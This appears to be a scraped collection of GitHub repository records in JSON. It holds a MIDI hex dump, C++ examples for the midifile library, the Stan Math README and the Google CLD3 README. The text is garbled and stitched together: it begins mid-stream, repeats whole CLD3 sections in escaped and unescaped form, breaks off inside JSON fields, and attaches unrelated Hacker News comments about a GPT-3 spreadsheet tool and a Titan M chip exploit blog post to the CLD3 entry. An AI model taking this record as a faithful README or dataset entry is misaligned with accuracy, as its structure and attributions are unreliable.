3d 40 00\n93 3c 40 3c 83 3c 40 00 93 3a 40 3c 83 3a 40 00 93 3c 40 81 70 83 3c 40 00 93 3d 40 81 70 83 3d 40 00 93 39 40 81 70 83\n39 40 00 93 36 40 81 70 83 36 40 00 93 38 40 81 70 83 38 40 00 93 35 40 81 70 83 35 40 00 93 36 40 81 70 83 36 40 00 93\n38 40 83 60 83 38 40 00 93 33 40 83 60 83 33 40 9b 18 93 2c 40 78 83 2c 40 00 93 31 40 78 83 31 40 00 93 31 40 78 83 31\n40 00 93 31 40 78 83 31 40 00 93 30 40 3c 83 30 40 00 93 2e 40 3c 83 2e 40 00 93 30 40 81 70 83 30 40 00 93 31 40 81 70\n83 31 40 90 70 93 31 40 83 60 83 31 40 00 93 30 40 81 70 83 30 40 00 93 34 40 81 70 83 34 40 00 93 33 40 83 60 83 33 40\n00 93 31 40 78 83 31 40 00 93 34 40 78 83 34 40 00 93 39 40 78 83 39 40 00 93 39 40 78 83 39 40 00 93 39 40 78 83 39 40\n00 93 38 40 3c 83 38 40 00 93 36 40 3c 83 36 40 00 93 38 40 83 60 83 38 40 00 93 36 40 81 70 83 36 40 00 93 38 40 83 60\n83 38 40 00 93 39 40 81 70 83 39 40 00 93 36 40 82 2c 83 36 40 00 93 36 40 3c 83 36 40 00 93 34 40 3c 83 34 40 00 93 33\n40 3c 83 33 40 00 93 34 40 78 83 34 40 00 93 31 40 78 83 31 40 00 93 38 40 83 60 83 38 40 00 93 36 40 81 70 83 36 40 00\n93 33 40 81 70 83 33 40 00 93 34 40 3c 83 34 40 00 93 33 40 3c 83 33 40 00 93 34 40 3c 83 34 40 00 93 36 40 3c 83 36 40\n00 93 34 40 3c 83 34 40 00 93 33 40 3c 83 33 40 00 93 31 40 3c 83 31 40 00 93 34 40 3c 83 34 40 00 93 33 40 3c 83 33 40\n00 93 31 40 3c 83 31 40 00 93 33 40 3c 83 33 40 00 93 34 40 3c 83 34 40 00 93 33 40 3c 83 33 40 00 93 31 40 3c 83 31 40\n00 93 30 40 3c 83 30 40 00 93 33 40 3c 83 33 40 00 93 31 40 78 83 31 40 00 93 34 40 78 83 34 40 00 93 39 40 78 83 39 40\n00 93 39 40 78 83 39 40 00 93 39 40 78 83 39 40 00 93 37 40 3c 83 37 40 00 93 36 40 3c 83 36 40 00 93 34 40 81 70 83 34\n40 78 93 36 40 78 83 36 40 00 93 3b 40 78 83 3b 40 00 93 3b 40 78 83 3b 40 00 93 3b 40 78 83 3b 40 00 93 39 40 3c 83 39\n40 00 93 38 40 3c 83 38 40 00 93 39 40 3c 83 39 40 00 93 38 40 3c 83 38 40 00 93 36 40 3c 83 36 40 00 93 34 40 3c 83 34\n40 00 93 33 40 81 70 83 33 40 78 93 38 40 78 83 38 40 00 93 3f 40 78 83 3f 40 00 93 3f 40 78 83 3f 40 00 93 3f 40 78 83\n3f 40 00 93 3d 40 3c 83 3d 40 00 93 3c 40 3c 83 3c 40 00 93 3d 40 83 60 83 3d 40 00 93 3c 40 81 70 83 3c 40 00 93 40 40\n82 68 83 40 40 00 93 31 40 78 83 31 40 00 93 36 40 78 83 36 40 00 93 36 40 78 83 36 40 00 93 36 40 78 83 36 40 00 93 35\n40 3c 83 35 40 00 93 33 40 3c 83 33 40 00 93 31 40 83 60 83 31 40 00 93 33 40 82 68 83 33 40 00 93 33 40 78 83 33 40 00\n93 38 40 78 83 38 40 00 93 38 40 78 83 38 40 00 93 38 40 78 83 38 40 00 93 36 40 3c 83 36 40 00 93 34 40 3c 83 34 40 00\n93 36 40 78 83 36 40 00 93 36 40 78 83 36 40 00 93 36 40 78 83 36 40 00 93 34 40 3c 83 34 40 00 93 33 40 3c 83 33 40 00\n93 34 40 78 83 34 40 00 93 33 40 3c 83 33 40 00 93 31 40 3c 83 31 40 
00 93 33 40 78 83 33 40 00 93 2c 40 78 83 2c 40 00\n93 31 40 78 83 31 40 00 93 31 40 78 83 31 40 00 93 31 40 78 83 31 40 00 93 2f 40 3c 83 2f 40 00 93 2e 40 3c 83 2e 40 00\n93 33 40 82 2c 83 33 40 00 93 34 40 3c 83 34 40 00 93 36 40 81 34 83 36 40 00 93 34 40 3c 83 34 40 00 93 33 40 3c 83 33\n40 00 93 31 40 3c 83 31 40 00 93 38 40 83 60 83 38 40 00 93 39 40 82 68 83 39 40 00 93 38 40 3c 83 38 40 00 93 39 40 3c\n83 39 40 00 93 3b 40 78 83 3b 40 00 93 39 40 78 83 39 40 00 93 38 40 78 83 38 40 00 93 36 40 78 83 36 40 00 93 3d 40 78\n83 3d 40 00 93 3b 40 3c 83 3b 40 00 93 39 40 3c 83 39 40 00 93 38 40 78 83 38 40 00 93 36 40 78 83 36 40 00 93 38 40 83\n60 83 38 40 77 90 00 00 00 ff 2f 00 4d 54 72 6b 00 00 07 cd 00 90 31 40 83 60 80 31 40 00 90 30 40 81 70 80 30 40 00 90\n34 40 81 70 80 34 40 00 90 33 40 83 60 80 33 40 00 90 31 40 78 80 31 40 00 90 33 40 78 80 33 40 00 90 34 40 82 68 80 34\n40 00 90 33 40 3c 80 33 40 00 90 31 40 3c 80 31 40 00 90 33 40 78 80 33 40 00 90 38 40 78 80 38 40 00 90 31 40 78 80 31\n40 00 90 33 40 3c 80 33 40 00 90 34 40 3c 80 34 40 00 90 36 40 82 68 80 36 40 00 90 34 40 78 80 34 40 00 90 33 40 78 80\n33 40 00 90 31 40 78 80 31 40 00 90 33 40 81 70 80 33 40 00 90 31 40 82 68 80 31 40 00 90 2f 40 78 80 2f 40 00 90 2d 40\n78 80 2d 40 00 90 2c 40 78 80 2c 40 00 90 2d 40 81 70 80 2d 40 00 90 2e 40 81 70 80 2e 40 00 90 30 40 81 70 80 30 40 00\n90 31 40 81 70 80 31 40 00 90 2c 40 78 80 2c 40 00 90 2d 40 78 80 2d 40 00 90 2f 40 82 68 80 2f 40 00 90 2d 40 78 80 2d\n40 00 90 2c 40 78 80 2c 40 00 90 2a 40 78 80 2a 40 00 90 31 40 81 70 80 31 40 00 90 2d 40 82 68 80 2d 40 00 90 2c 40 78\n80 2c 40 00 90 2a 40 78 80 2a 40 00 90 28 40 78 80 28 40 00 90 2a 40 81 70 80 2a 40 00 90 2c 40 81 70 80 2c 40 00 90 2d\n40 78 80 2d 40 00 90 2c 40 78 80 2c 40 00 90 2d 40 78 80 2d 40 00 90 2f 40 78 80 2f 40 00 90 31 40 78 80 31 40 00 90 2f\n40 78 80 2f 40 00 90 31 40 78 80 31 40 00 90 33 40 78 80 33 40 00 90 34 40 81 70 80 34 40 00 90 31 40 82 68 80 31 40 00\n90 2f 40 78 80 2f 40 00 90 2e 40 78 80 2e 40 00 90 2c 40 78 80 2c 40 00 90 31 40 81 70 80 31 40 00 90 33 40 81 70 80 33\n40 00 90 2c 40 81 70 80 2c 40 9a 20 90 2f 40 81 70 80 2f 40 00 90 2e 40 81 70 80 2e 40 00 90 33 40 81 70 80 33 40 00 90\n31 40 83 60 80 31 40 00 90 2f 40 84 58 80 2f 40 00 90 38 40 78 80 38 40 00 90 36 40 78 80 36 40 00 90 34 40 78 80 34 40\n00 90 3b 40 81 70 80 3b 40 00 90 2f 40 81 70 80 2f 40 00 90 34 40 81 70 80 34 40 00 90 39 40 81 70 80 39 40 00 90 38 40\n81 70 80 38 40 00 90 3d 40 83 60 80 3d 40 00 90 3c 40 81 70 80 3c 40 00 90 3d 40 81 70 80 3d 40 95 48 90 31 40 3c 80 31\n40 00 90 33 40 3c 80 33 40 00 90 34 40 78 80 34 40 00 90 36 40 78 80 36 40 00 90 38 40 3c 80 38 40 00 90 36 40 3c 80 36\n40 00 90 38 40 3c 80 38 40 00 90 39 40 3c 80 39 40 00 90 38 40 3c 80 38 40 00 90 36 40 3c 80 36 40 00 90 34 40 3c 80 34\n40 00 90 38 40 3c 80 38 40 00 90 36 40 3c 80 36 40 00 90 34 40 3c 80 34 40 00 90 36 40 3c 80 36 40 00 90 38 40 3c 80 38\n40 00 90 36 40 3c 80 36 40 00 90 34 40 3c 80 34 40 00 90 33 40 3c 80 33 40 00 90 36 40 3c 80 36 40 00 90 34 40 3c 80 34\n40 00 90 33 40 3c 80 33 40 00 90 34 40 3c 80 34 40 00 90 36 40 3c 80 36 40 00 90 34 40 3c 80 34 40 00 90 39 40 3c 80 39\n40 00 90 38 40 3c 80 38 40 00 90 39 40 3c 80 39 40 00 90 33 40 3c 80 33 40 00 90 31 40 3c 80 31 40 00 90 33 40 3c 80 33\n40 00 90 34 40 3c 80 34 40 00 90 33 40 3c 80 33 40 00 90 38 40 3c 80 38 40 00 90 36 40 3c 80 36 40 00 90 38 40 3c 80 38\n40 00 90 31 40 81 70 80 31 40 95 48 90 34 40 78 80 34 40 00 90 39 40 78 80 39 40 00 90 39 40 78 80 39 40 00 90 39 
40 78\n80 39 40 00 90 38 40 3c 80 38 40 00 90 36 40 3c 80 36 40 00 90 38 40 81 70 80 38 40 00 90 39 40 81 70 80 39 40 00 90 36\n40 81 70 80 36 40 00 90 2f 40 81 70 80 2f 40 00 90 34 40 81 70 80 34 40 00 90 2d 40 83 60 80 2d 40 00 90 2c 40 81 70 80\n2c 40 91 68 90 2c 40 78 80 2c 40 00 90 31 40 78 80 31 40 00 90 31 40 78 80 31 40 00 90 31 40 78 80 31 40 00 90 2f 40 3c\n80 2f 40 00 90 2e 40 3c 80 2e 40 00 90 2f 40 3c 80 2f 40 00 90 2e 40 3c 80 2e 40 00 90 2c 40 3c 80 2c 40 00 90 2f 40 3c\n80 2f 40 00 90 2e 40 3c 80 2e 40 00 90 2c 40 3c 80 2c 40 00 90 2e 40 3c 80 2e 40 00 90 2f 40 3c 80 2f 40 00 90 2e 40 3c\n80 2e 40 00 90 2c 40 3c 80 2c 40 00 90 2a 40 3c 80 2a 40 00 90 2e 40 3c 80 2e 40 00 90 2c 40 3c 80 2c 40 00 90 2a 40 3c\n80 2a 40 00 90 2c 40 3c 80 2c 40 00 90 2e 40 3c 80 2e 40 00 90 2c 40 3c 80 2c 40 00 90 2f 40 3c 80 2f 40 00 90 2e 40 3c\n80 2e 40 00 90 2c 40 3c 80 2c 40 00 90 2b 40 81 70 80 2b 40 00 90 2c 40 81 70 80 2c 40 00 90 2e 40 81 70 80 2e 40 00 90\n33 40 81 70 80 33 40 00 90 2c 40 81 70 80 2c 40 85 50 90 25 40 83 60 80 25 40 00 90 30 40 81 70 80 30 40 00 90 28 40 81\n70 80 28 40 00 90 27 40 83 60 80 27 40 00 90 25 40 78 80 25 40 00 90 25 40 3c 80 25 40 00 90 27 40 3c 80 27 40 00 90 28\n40 78 80 28 40 00 90 2a 40 78 80 2a 40 00 90 2c 40 3c 80 2c 40 00 90 2a 40 3c 80 2a 40 00 90 2c 40 3c 80 2c 40 00 90 2d\n40 3c 80 2d 40 00 90 2c 40 3c 80 2c 40 00 90 2a 40 3c 80 2a 40 00 90 28 40 3c 80 28 40 00 90 2c 40 3c 80 2c 40 00 90 2a\n40 3c 80 2a 40 00 90 28 40 3c 80 28 40 00 90 2a 40 3c 80 2a 40 00 90 2c 40 3c 80 2c 40 00 90 2a 40 3c 80 2a 40 00 90 28\n40 3c 80 28 40 00 90 27 40 3c 80 27 40 00 90 2a 40 3c 80 2a 40 00 90 28 40 78 80 28 40 00 90 34 40 78 80 34 40 00 90 39\n40 78 80 39 40 00 90 39 40 78 80 39 40 00 90 39 40 78 80 39 40 00 90 38 40 3c 80 38 40 00 90 36 40 3c 80 36 40 00 90 38\n40 78 80 38 40 00 90 2c 40 78 80 2c 40 00 90 31 40 78 80 31 40 00 90 2f 40 78 80 2f 40 00 90 2d 40 81 70 80 2d 40 00 90\n2c 40 78 80 2c 40 8f 00 90 31 40 78 80 31 40 00 90 36 40 78 80 36 40 00 90 36 40 78 80 36 40 00 90 36 40 78 80 36 40 00\n90 35 40 3c 80 35 40 00 90 33 40 3c 80 33 40 00 90 35 40 81 70 80 35 40 00 90 36 40 81 70 80 36 40 86 48 90 2c 40 78 80\n2c 40 00 90 31 40 78 80 31 40 00 90 31 40 78 80 31 40 00 90 31 40 78 80 31 40 00 90 30 40 3c 80 30 40 00 90 2e 40 3c 80\n2e 40 00 90 30 40 3c 80 30 40 00 90 31 40 3c 80 31 40 00 90 33 40 3c 80 33 40 00 90 30 40 3c 80 30 40 00 90 28 40 81 70\n80 28 40 78 90 2d 40 78 80 2d 40 00 90 27 40 81 70 80 27 40 78 90 2c 40 78 80 2c 40 00 90 25 40 78 80 25 40 8c 18 90 31\n40 81 70 80 31 40 00 90 30 40 81 70 80 30 40 00 90 34 40 81 70 80 34 40 00 90 33 40 83 60 80 33 40 00 90 31 40 78 80 31\n40 00 90 34 40 78 80 34 40 00 90 39 40 78 80 39 40 00 90 39 40 78 80 39 40 00 90 39 40 78 80 39 40 00 90 38 40 3c 80 38\n40 00 90 36 40 3c 80 36 40 00 90 34 40 3c 80 34 40 00 90 33 40 3c 80 33 40 00 90 31 40 3c 80 31 40 00 90 2f 40 3c 80 2f\n40 00 90 2e 40 81 70 80 2e 40 00 90 2d 40 82 68 80 2d 40 00 90 2c 40 3c 80 2c 40 00 90 2a 40 3c 80 2a 40 00 90 29 40 81\n70 80 29 40 00 90 2a 40 83 60 80 2a 40 00 90 2c 40 8f 00 80 2c 40 00 90 2b 40 83 60 80 2b 40 00 90 2c 40 87 40 80 2c 40\n00 90 31 40 8f 00 80 31 40 77 90 00 00 00 ff 2f 00\n```\n\n\n### How to split MIDI tracks into separate MIDI files ###\n\nThe following program takes a multi-track MIDI file with three\nor more tracks, and splits out each track into a separate MIDI\nfile. 
The expression track of the original MIDI file is copied\ninto the 0th track of each new MIDI file, and the individual\ntracks of the original MIDI file are copied to the 1st track of\nthe output MIDI files.\n\n```cpp\n#include \"MidiFile.h\"\n#include <iostream>\n#include <string>\n#include <vector>\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n if (argc != 3) {\n cerr << \"Usage: \" << argv[0] << \" input output\" << endl;\n return 1;\n }\n MidiFile midifile(argv[1]);\n if (!midifile.status()) {\n cerr << \"Problem reading input\" << endl;\n return 1;\n }\n if (midifile.getTrackCount() < 3) {\n cerr << \"Not enough tracks to split\" << endl;\n return 1;\n }\n string basename = argv[2];\n if (basename.substr(basename.size() - 4) == \".mid\")\n basename = basename.substr(0, basename.size() - 4);\n int outcount = midifile.getTrackCount() - 1;\n vector<MidiFile> outputs(outcount);\n for (int i=0; i<outcount; i++) {\n outputs[i].addTrack(); // two tracks per output file\n outputs[i].setTicksPerQuarterNote(midifile.getTicksPerQuarterNote());\n // copy the expression track (input track 0) into output track 0:\n for (int j=0; j<midifile[0].size(); j++)\n outputs[i].addEvent(0, midifile[0][j].tick, midifile[0][j]);\n // copy input track i+1 into output track 1:\n for (int j=0; j<midifile[i+1].size(); j++)\n outputs[i].addEvent(1, midifile[i+1][j].tick, midifile[i+1][j]);\n outputs[i].write(basename + \"-\" + to_string(i+1) + \".mid\");\n }\n return 0;\n}\n```\n\n\n### How to add a sine-wave vibrato with pitch bends ###\n\nThe following program adds a sine-wave vibrato to a MIDI file by sampling\npitch-bend messages at a regular rate for the file's full duration and\nstoring them in a separate track. Options control the vibrato frequency,\nits depth in cents, the synthesizer's maximum bend depth, and the rate at\nwhich the bend messages are sampled:\n\n```cpp\n#include \"MidiFile.h\"\n#include \"Options.h\"\n#include <cmath>\n#include <iostream>\n#include <utility>\n#include <vector>\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n Options options;\n options.define(\"f|frequency=d:4.0\", \"vibrato frequency\");\n options.define(\"d|depth=d:20.0\", \"vibrato depth in cents\");\n options.define(\"b|bend-max=d:200.0\", \"pitch bend depth\");\n options.define(\"s|sample-rate=d:100.0\", \"sample rate\");\n options.define(\"o|output-file=s\", \"output filename\");\n options.define(\"c|channel=i:0\", \"output channel\");\n options.process(argc, argv);\n\n MidiFile midifile;\n if (options.getArgCount() == 0) midifile.read(cin);\n else midifile.read(options.getArg(1));\n if (!midifile.status()) {\n cerr << \"Problem reading file\" << endl;\n return 1;\n }\n\n string filename = options.getString(\"output-file\");\n int channel = options.getInteger(\"channel\");\n double freq = options.getDouble(\"frequency\");\n double depth = options.getDouble(\"depth\");\n double bend = options.getDouble(\"bend-max\");\n double srate = options.getDouble(\"sample-rate\");\n double phase = 0.0;\n double twopi = 2.0 * M_PI;\n double increment = twopi * freq / srate;\n double maxtime = midifile.getFileDurationInSeconds();\n midifile.addTrack(); // store vibrato in separate track\n pair<int, double> tickbend;\n vector<pair<int, double>> storage;\n int count = maxtime * srate;\n storage.reserve(maxtime * srate + 1000);\n for (int i=0; i<count; i++) {\n tickbend.first = midifile.getAbsoluteTickTime(i / srate);\n tickbend.second = depth / bend * sin(phase);\n if ((i > 0) && (tickbend.first == 0)) break;\n storage.push_back(tickbend);\n phase += increment;\n if (phase > twopi) phase -= twopi;\n }\n int track = midifile.getTrackCount() - 1;\n for (int i=0; i<(int)storage.size(); i++)\n midifile.addPitchBend(track, storage[i].first, channel, storage[i].second);\n if (filename.empty()) cout << midifile;\n else midifile.write(filename);\n return 0;\n}\n```\n\n\n### Polyrhythm generator ###\n\nHere is a program that generates polyrhythm patterns. Command line\noptions are:\n\n| option | default value | meaning |\n|:--------:|:-------------:|:------------------------------------------:|\n| `-a` | 2 | first instrument's division of the cycle |\n| `-b` | 3 | second instrument's division of the cycle |\n| `-c` | 10 | number of cycles |\n| `-d` | 2.0 | duration of each cycle in seconds |\n| `--key1` | 76 | percussion key number for first instrument |\n| `--key2` | 77 | percussion key number for second instrument |\n| `-o` | | output filename |\n
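\nWith the default values `a=2` and `b=3`, the program sets the file's ticks\nper quarter note to `a*b = 6` and makes each cycle last one quarter note,\nso the first instrument's strokes land every `b = 3` ticks and the second\ninstrument's strokes land every `a = 2` ticks; choosing `a*b` as the TPQ\nguarantees that both subdivisions of the cycle fall on integer tick values.\n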
\n```cpp\n#include \"MidiFile.h\"\n#include \"Options.h\"\n#include <iostream>\n#include <string>\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n Options options;\n options.define(\"a=i:2\", \"cycle division 1\");\n options.define(\"b=i:3\", \"cycle division 2\");\n options.define(\"c|cycle=i:10\", \"cycle count\");\n options.define(\"d|dur=d:2.0\", \"duration of cycle in seconds\");\n options.define(\"key1=i:76\", \"first percussion key number\");\n options.define(\"key2=i:77\", \"second percussion key number\");\n options.define(\"o|output-file=s\", \"output filename\");\n options.process(argc, argv);\n\n int a = options.getInteger(\"a\");\n int b = options.getInteger(\"b\");\n int c = options.getInteger(\"cycle\");\n int key1 = options.getInteger(\"key1\");\n int key2 = options.getInteger(\"key2\");\n double dur = options.getDouble(\"dur\");\n double tempo = 60.0 / dur;\n\n MidiFile midifile;\n midifile.setTPQ(a*b);\n midifile.addTempo(0, 0, tempo);\n midifile.addTracks(2);\n for (int i=0; i<c; i++) {\n for (int j=0; j<a; j++) { // first instrument: a strokes per cycle\n int tick = i*a*b + j*b;\n midifile.addNoteOn(1, tick, 9, key1, 64);\n midifile.addNoteOff(1, tick+1, 9, key1);\n }\n for (int j=0; j<b; j++) { // second instrument: b strokes per cycle\n int tick = i*a*b + j*a;\n midifile.addNoteOn(2, tick, 9, key2, 64);\n midifile.addNoteOff(2, tick+1, 9, key2);\n }\n }\n midifile.sortTracks();\n string filename = options.getString(\"output-file\");\n if (filename.empty()) cout << midifile;\n else midifile.write(filename);\n return 0;\n}\n```\n\n\nThe Stan Math Library is a C++, reverse-mode automatic\ndifferentiation library designed to be usable, extensive and\nextensible, efficient, scalable, stable, portable, and redistributable\nin order to facilitate the construction and utilization of algorithms\nthat utilize derivatives.\n\n\nDocumentation, Installation, and Examples\n--------------\n\nAll of Stan math's documentation is hosted on our website below. Please do not\nreference articles in the wiki as they are outdated and not maintained.\n\n[mc-stan.org/math](https://mc-stan.org/math/)\n\n\nLicensing\n---------\nThe Stan Math Library is licensed under the [new BSD\nlicense](https://github.com/stan-dev/math/blob/develop/LICENSE%2Emd).\n\nThe Stan Math Library depends on the Intel TBB library which is\nlicensed under the Apache 2.0 license. This dependency implies an\nadditional restriction as compared to the new BSD license alone. The\nApache 2.0 license is incompatible with GPL-2 licensed code if\ndistributed as a unitary binary. You may refer to the Licensing page on the [Stan wiki](https://github.com/stan-dev/stan/wiki/Stan-Licensing).\n\", \"readme_type\": \"markdown\", \"hn_comments\": \"\", \"gh_updated_time\": \"\", \"gh_accessed_time\": \"\", \"hn_accessed_time\": \"\"}, {\"name\": \"google/cld3\", \"link\": \"https://github.com/google/cld3\", \"tags\": [], \"stars\": 633, \"description\": null, \"lang\": \"C++\", \"repo_lang\": \"\", \"readme\": \"# Compact Language Detector v3 (CLD3)\n\n* [Model](#model)\n* [Supported Languages](#supported-languages)\n* [Installation](#installation)\n* [Bugs and Feature Requests](#bugs-and-feature-requests)\n* [Credits](#credits)\n\n### Model\n\nCLD3 is a neural network model for language identification. This package\n contains the inference code and a trained model. The inference code\n extracts character ngrams from the input text and computes the fraction\n of times each of them appears. 
For example, as shown in the figure below,\n if the input text is \"banana\", then one of the extracted trigrams is \"ana\"\n and the corresponding fraction is 2/4. The ngrams are hashed down to an id\n within a small range, and each id is represented by a dense embedding vector\n estimated during training.\n\nThe model averages the embeddings corresponding to each ngram type according\n to the fractions, and the averaged embeddings are concatenated to produce\n the embedding layer. The remaining components of the network are a hidden\n (Rectified linear) layer and a softmax layer.\n\nTo get a language prediction for the input text, we simply perform a forward\n pass through the network.\n\n![Figure](model.png \"CLD3\")\n
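\nTo make the ngram-extraction stage concrete, here is a small illustrative\nsketch (not cld3's actual implementation) that computes character-trigram\nfractions and hashes each trigram into a small id range; the bucket count\nbelow is an arbitrary assumption:\n\n```cpp\n#include <functional>\n#include <iostream>\n#include <string>\n#include <unordered_map>\n\nint main() {\n std::string text = \"banana\";\n const int kNumBuckets = 1 << 10; // small hash range for embedding ids\n std::unordered_map<std::string, int> counts;\n int total = 0;\n for (size_t i = 0; i + 3 <= text.size(); i++) {\n counts[text.substr(i, 3)]++; // \"ana\" is counted twice\n total++;\n }\n for (const auto& entry : counts) {\n size_t id = std::hash<std::string>{}(entry.first) % kNumBuckets;\n double fraction = double(entry.second) / total; // 2/4 for \"ana\"\n std::cout << entry.first << \" -> id \" << id\n << \", fraction \" << fraction << std::endl;\n }\n return 0;\n}\n```\n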
\n### Supported Languages\n\nThe model outputs BCP-47-style language codes, shown in the table below. For\nsome languages, output is differentiated by script. Language and script names\nfrom\n[Unicode CLDR](https://github.com/unicode-cldr/cldr-localenames-modern/blob/master/main/en).\n\nOutput Code | Language Name | Script Name\n----------- | --------------- | ------------------------------------------\naf | Afrikaans | Latin\nam | Amharic | Ethiopic\nar | Arabic | Arabic\nbg | Bulgarian | Cyrillic\nbg-Latn | Bulgarian | Latin\nbn | Bangla | Bangla\nbs | Bosnian | Latin\nca | Catalan | Latin\nceb | Cebuano | Latin\nco | Corsican | Latin\ncs | Czech | Latin\ncy | Welsh | Latin\nda | Danish | Latin\nde | German | Latin\nel | Greek | Greek\nel-Latn | Greek | Latin\nen | English | Latin\neo | Esperanto | Latin\nes | Spanish | Latin\net | Estonian | Latin\neu | Basque | Latin\nfa | Persian | Arabic\nfi | Finnish | Latin\nfil | Filipino | Latin\nfr | French | Latin\nfy | Western Frisian | Latin\nga | Irish | Latin\ngd | Scottish Gaelic | Latin\ngl | Galician | Latin\ngu | Gujarati | Gujarati\nha | Hausa | Latin\nhaw | Hawaiian | Latin\nhi | Hindi | Devanagari\nhi-Latn | Hindi | Latin\nhmn | Hmong | Latin\nhr | Croatian | Latin\nht | Haitian Creole | Latin\nhu | Hungarian | Latin\nhy | Armenian | Armenian\nid | Indonesian | Latin\nig | Igbo | Latin\nis | Icelandic | Latin\nit | Italian | Latin\niw | Hebrew | Hebrew\nja | Japanese | Japanese\nja-Latn | Japanese | Latin\njv | Javanese | Latin\nka | Georgian | Georgian\nkk | Kazakh | Cyrillic\nkm | Khmer | Khmer\nkn | Kannada | Kannada\nko | Korean | Korean\nku | Kurdish | Latin\nky | Kyrgyz | Cyrillic\nla | Latin | Latin\nlb | Luxembourgish | Latin\nlo | Lao | Lao\nlt | Lithuanian | Latin\nlv | Latvian | Latin\nmg | Malagasy | Latin\nmi | Maori | Latin\nmk | Macedonian | Cyrillic\nml | Malayalam | Malayalam\nmn | Mongolian | Cyrillic\nmr | Marathi | Devanagari\nms | Malay | Latin\nmt | Maltese | Latin\nmy | Burmese | Myanmar\nne | Nepali | Devanagari\nnl | Dutch | Latin\nno | Norwegian | Latin\nny | Nyanja | Latin\npa | Punjabi | Gurmukhi\npl | Polish | Latin\nps | Pashto | Arabic\npt | Portuguese | Latin\nro | Romanian | Latin\nru | Russian | Cyrillic\nru-Latn | Russian | Latin\nsd | Sindhi | Arabic\nsi | Sinhala | Sinhala\nsk | Slovak | Latin\nsl | Slovenian | Latin\nsm | Samoan | Latin\nsn | Shona | Latin\nso | Somali | Latin\nsq | Albanian | Latin\nsr | Serbian | Cyrillic\nst | Southern Sotho | Latin\nsu | Sundanese | Latin\nsv | Swedish | Latin\nsw | Swahili | Latin\nta | Tamil | Tamil\nte | Telugu | Telugu\ntg | Tajik | Cyrillic\nth | Thai | Thai\ntr | Turkish | Latin\nuk | Ukrainian | Cyrillic\nur | Urdu | Arabic\nuz | Uzbek | Latin\nvi | Vietnamese | Latin\nxh | Xhosa | Latin\nyi | Yiddish | Hebrew\nyo | Yoruba | Latin\nzh | Chinese | Han (including Simplified and Traditional)\nzh-Latn | Chinese | Latin\nzu | Zulu | Latin\n\n### Installation\nCLD3 is designed to run in the Chrome browser, so it relies on code in\n[Chromium](http://www.chromium.org/).\nThe steps for building and running the demo of the language detection model are:\n\n- [check out](http://www.chromium.org/developers/how-tos/get-the-code) the\n Chromium repository.\n- copy the code to `//third_party/cld_3`\n- Uncomment `language_identifier_main` executable in `src/BUILD.gn`.\n- build and run the model using the commands:\n\n```shell\ngn gen out/Default\nninja -C out/Default third_party/cld_3/src/src:language_identifier_main\nout/Default/language_identifier_main\n```\n### Bugs and Feature Requests\n\nOpen a [GitHub issue](https://github.com/google/cld3/issues) for this repository to file bugs and feature requests.\n\n### Announcements and Discussion\n\nFor announcements regarding major updates as well as a general discussion list, please subscribe to:\n[cld3-users@googlegroups.com](https://groups.google.com/forum/#!forum/cld3-users)\n\n### Credits\n\nOriginal authors of the code in this package include (in alphabetical order):\n\n* Alex Salcianu\n* Andy Golding\n* Anton Bakalov\n* Chris Alberti\n* Daniel Andor\n* David Weiss\n* Emily Pitler\n* Greg Coppola\n* Jason Riesa\n* Kuzman Ganchev\n* Michael Ringgaard\n* Nan Hua\n* Ryan McDonald\n* Slav Petrov\n* Stefan Istrate\n* Terry Koo\n\", \"readme_type\": \"markdown\", \"hn_comments\": \"GPT-3 is a very smart tool; using it on top of Excel and Sheets should help save time. This article talks about using GPT-3 (using my AI tool) to do your routine tasks on Google Sheets and Excel, such as extracting data, finding duplicates, and so on. I am open to feedback.\nAs an aside, this was published last week. Imagine how much they could have done if they didn't have to do blackbox fuzzing, and how many holes in the device would have been closed. \"Attacking Titan M with Only One Byte\" [0]\n> ...Titan M, a security chip introduced by Google in their Pixel smartphones, starting from the Pixel 3. In this blog post, ...we show how we found this vulnerability, using emulation-based fuzzing with AFL++ in Unicorn mode. Then, we go over the exploitation and its inherent challenges, that eventually led us to obtain code execution on the chip.\n[0] https://blog.quarkslab.com/attacking-titan-m-with-only-one-b...\nI'm curious if this is a legally binding promise in any major jurisdiction. E.g., can someone in the U.S. sue Google for specific performance to uphold that promise? I'm not talking about suing for monetary compensation, or accepting an out-of-court settlement. I'm talking, full-strength, possibly precedent-setting, fulfillment of that promise in federal court? I would so contribute to a legal fund for that, especially with the stipulation that my money must be returned if an out-of-court settlement were reached.\nOnly viewable signed in.\nWhoever wrote that blog post has probably long since moved on to other things....\nI'm convinced that any project named Titan will fail to ship (or fail immediately after shipping, as in the most famous instance). Apple's car project was Titan, Facebook's gmail killer was Project Titan, I think Activision Blizzard had a Titan. Google has this, but I don't even think it's their first Titan to not ship, I'm blanking on the other. (Edit: Google's defunct internet drone project was Titan)\n\n- My phone is bricked...\n- Please go to Settings...\n\nThat was hilarious :)\nHuhn. 
### Bugs and Feature Requests\n\nOpen a [GitHub issue](https://github.com/google/cld3/issues) for this repository to file bugs and feature requests.\n\n### Announcements and Discussion\n\nFor announcements regarding major updates as well as general discussion, please subscribe to:\n[cld3-users@googlegroups.com](https://groups.google.com/forum/#!forum/cld3-users)\n\n### Credits\n\nOriginal authors of the code in this package include (in alphabetical order):\n\n* Alex Salcianu\n* Andy Golding\n* Anton Bakalov\n* Chris Alberti\n* Daniel Andor\n* David Weiss\n* Emily Pitler\n* Greg Coppola\n* Jason Riesa\n* Kuzman Ganchev\n* Michael Ringgaard\n* Nan Hua\n* Ryan McDonald\n* Slav Petrov\n* Stefan Istrate\n* Terry Koo\n", "readme_type": "markdown", "hn_comments": "GPT-3 is a very smart tool; using it on top of Excel and Sheets should help save time.This article talks about using GPT-3 (via my AI tool) to do your routine tasks on Google Sheets and Excel, such as extracting data, finding duplicates, and so on.I am open to feedback.As an aside, this was published last week. Imagine how much they could have done if they didn't have to do blackbox fuzzing, and how many holes in the device would have been closed.\"Attacking Titan M with Only One Byte\" [0]> ...Titan M, a security chip introduced by Google in their Pixel smartphones, starting from the Pixel 3. In this blog post, ...we show how we found this vulnerability, using emulation-based fuzzing with AFL++ in Unicorn mode. Then, we go over the exploitation and its inherent challenges, that eventually led us to obtain code execution on the chip.[0] https://blog.quarkslab.com/attacking-titan-m-with-only-one-b...I'm curious if this is a legally binding promise in any major jurisdiction.E.g., can someone in the U.S. sue Google for specific performance to uphold that promise?I'm not talking about suing for monetary 